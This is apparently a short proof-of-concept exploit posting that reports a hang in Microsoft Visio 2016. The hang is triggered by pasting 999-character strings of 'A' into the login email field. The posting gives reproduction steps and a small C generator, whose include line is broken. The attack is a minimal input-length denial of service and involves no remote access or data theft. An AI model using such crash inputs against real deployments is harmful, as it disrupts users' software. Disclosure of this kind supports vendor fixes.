# -⋆- coding: utf-8 -⋆- Created on Thu Feb 21 01:32:50 2019 @author: César """ #Exploit Title: Microsoft Visio 2016 (16.0.4738.1000) "Log in accounts" allows go on whit email formed by one thousand A in every of its parts AAA---A@AAA--A.AAA---A #Descovered by: César Adrián Coronado Llanos #Descovered Date; Sun Feb 17 20:34:23 2019 #Vendor Homepage: https://www.microsoft.com #Tested Version: 16.0.4738.1000 x64 #Tested on OS: Microsoft Windows 10 Home Single Language x64 #Versión 10.0.10240 compilación 10240 #Steps to produce the crash #1.- Run c code: generator.c #2.- Open the file created "letters.txt" and copy the text content to clipboard #3.- Open Visio 2016 #4.- Click in change account or Login #5.- In the Login paste the clipboard, typewrite @ paste again the clipboard, typewrite . and paste for last time the clipboard, clik in next #6.- Click in professional account #7.- Visio 2016 don't respond, however it stays in a white window and don't send us any message Note: For do this you need internet conection. #include int main(){ int i; FILE *letters; if((letters = fopen("letters.txt","w+")) != NULL){ for(i=0;i<999;i++){ fprintf(letters,"A"); } } fclose(letters); printf("\tThe file was created successfully!!\n"); } Note: This code was compiled in dev C++